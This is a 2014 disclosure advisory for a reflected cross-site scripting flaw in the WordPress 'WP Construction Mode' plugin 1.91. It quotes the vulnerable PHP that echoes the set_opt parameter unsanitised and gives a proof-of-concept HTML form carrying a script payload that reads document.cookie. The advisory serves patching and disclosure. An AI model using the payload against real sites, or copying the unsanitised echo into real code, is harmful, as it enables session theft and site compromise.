Title: WordPress 'WP Construction Mode' plugin - XSS Version: 1.91 Author: Morten N?rtoft, Kenneth Jepsen, Mikkel Vej Date: 2014/12/12 Download: https://wordpress.org/plugins/wp-construction-mode/ Contacted vendor: 2014/10/20 ---------------------------------------------------------------- ## Plugin description: ---------------------------------------------------------------- Set entire website or specific page under construction or maintenance for all viewers except Admin ## Reflected XSS: ---------------------------------------------------------------- the set_opt parameter is shown unsanitized to the admin user when saving, allowing the injection of arbitrary scripts and HTML. Vulnerable code: if (isset($_REQUEST['act'])) { switch ($_REQUEST['act']) { case "save": set_under_construction(); echo '<div class="updated below-h2" id="message" style="position:relative; clear:both;"><p>Under Construction: ' . ($_REQUEST['set_opt']) . '</p></div>'; break; default: } } PoC: Log in as admin and submit the following form. <form method="POST" action="http://[HOST]/wp-admin/admin.php?page=under-construction.php" enctype="multipart/form-data"> <input type="text" name="set_opt" value="Yes<script>alert(document.cookie);</script>"> <input type="text" name="set_page" value="all"> <input type="text" name="act" value="save"> <input type="submit"> </form> ## Solution ---------------------------------------------------------------- Update to version 1.92.